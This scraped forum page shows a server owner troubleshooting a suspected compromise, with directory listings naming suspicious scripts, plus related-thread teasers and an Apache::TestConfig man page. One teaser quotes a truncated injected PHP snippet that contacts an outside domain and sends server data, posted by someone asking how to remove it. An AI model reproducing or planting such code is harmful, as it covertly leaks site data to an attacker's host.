Malicious perl script Post: 302992363

Sponsored Content

Operating Systems Linux Debian Malicious perl script Post 302992363 by dadprpus on Friday 24th of February 2017 07:31:02 AM

02-24-2017

Registered User

Quote:

Originally Posted by drysdalk

Can I just check - it looks from what you've said that you're trying to type 1s (that's a number one followed by a lower-case letter 'S') rather than ls (that's a lower-case letter 'L' followed by a lower-case letter 'S', which is the correct command).

If that's what you've been doing, could you try again with the correct command name and see what happens please ?

If you have been typing it correctly then your system must be quite badly damaged or missing some very fundamental binaries, since the ls command is pretty much as common as it gets on any UNIX-style system.

You are right. I was doing it wrong. It did look like a 1 to me...so this is what I got:

Code:

[root@dedicated ~]# ls -l /proc/4600
ls: cannot access /proc/4600: No such file or directory
[root@dedicated ~]# ls -l/proc/4600/fd
ls: invalid option -- '/'
Try `ls --help' for more information.
[root@dedicated ~]# ls -l /proc/4600/fd
ls: cannot access /proc/4600/fd: No such file or directory
[root@dedicated ~]# ls -a
.                  echo                                      .odbc.ini
..                 findbot.pl                                parallels
1                  ghosttest                                 .pki
anaconda-ks.cfg    ghosttest.c                               plk
.autoinstaller     id_rsa.pub                                psasem.sem
.bash_history      install_keys.sh                           .rnd
.bash_logout       install.log                               run.pl
.bash_profile      install.log.syslog                        .spamassassin
.bashrc            .lesshst                                  .ssh
bash-shellshocker  mysql-community-release-el6-5.noarch.rpm  strace.log
.cshrc             .mysql_history                            .tcshrc

Tech support got back to me last night said it was a brute force attack (?) and that my install of "ban to fail" stopped it. But to me it looks as if it was run from "inside my computer". It slowed the server down to a crawl. also legitimate emails have stopped being able to send to comcast, Verizon, yahoo,etc. Have contacted them but they say we are not on their black list. Just can't figure this out. I have a minimal tech support package so they say "You have this....and you need to do this....good luck....Oh and by the way you can upgrade for $$$".

Last edited by dadprpus; 02-24-2017 at 08:39 AM..

dadprpus

View Public Profile for dadprpus

Find all posts by dadprpus

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ...

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated...

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -...

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl...

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"...

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not...

LEARN ABOUT REDHAT

apache::testconfig

Apache::TestConfig(3)					User Contributed Perl Documentation				     Apache::TestConfig(3)

NAME

       Apache::TestConfig -- Test Configuration setup module

SYNOPSIS

	 use Apache::TestConfig;

	 my $cfg = Apache::TestConfig->new(%args)
	 my $fh = $cfg->genfile($file);
	 $cfg->writefile($file, $content);
	 $cfg->gendir($dir);
	 ...

DESCRIPTION

       "Apache::TestConfig" is used in creating the "Apache::Test" configuration files.

FUNCTIONS

       genwarning()
	     my $warn = $cfg->genwarning($filename)

	   genwarning() returns a warning string as a comment, saying that the file was autogenerated and that it's not a good idea to modify this
	   file. After the warning a perl trace of calls to this this function is appended. This trace is useful for finding what code has created
	   the file.

	   genwarning() automatically recognizes the comment type based on the file extension. If the extension is not recognized, the default "#"
	   style is used.

	   Currently it support "<!-- -->", "/* ... */" and "#" styles.

       genfile()
	     my $fh = $cfg->genfile($file);

	   genfile() creates a new file $file for writing and returns a file handle.

	   A comment with a warning and calls trace is added to the top of this file. See genwarning() for more info about this comment.

	   If parent directories of $file don't exist they will be automagically created.

	   The file $file and any created parent directories (if found empty) will be automatically removed on cleanup.

       writefile()
	     $cfg->writefile($file, $content, [$nowarning]);

	   writefile() creates a new file $file with the content of $content.

	   A comment with a warning and calls trace is added to the top of this file unless $nowarnings is passed and set to a true value. See
	   genwarning() for more info about this comment.

	   If parent directories of $file don't exist they will be automagically created.

	   The file $file and any created parent directories (if found empty) will be automatically removed on cleanup.

       write_perlscript()
	     $cfg->write_perlscript($filename, @lines);

	   Similar to writefile() but creates an executable Perl script with correctly set shebang line.

       gendir()
	     $cfg->gendir($dir);

	   gendir() creates a new directory $dir.

	   If parent directories of $dir don't exist they will be automagically created.

	   The directory $dir and any created parent directories will be automatically removed on cleanup if found empty.

AUTHOR

SEE ALSO

       perl(1), Apache::Test(3)

perl v5.8.0							    2002-09-10						     Apache::TestConfig(3)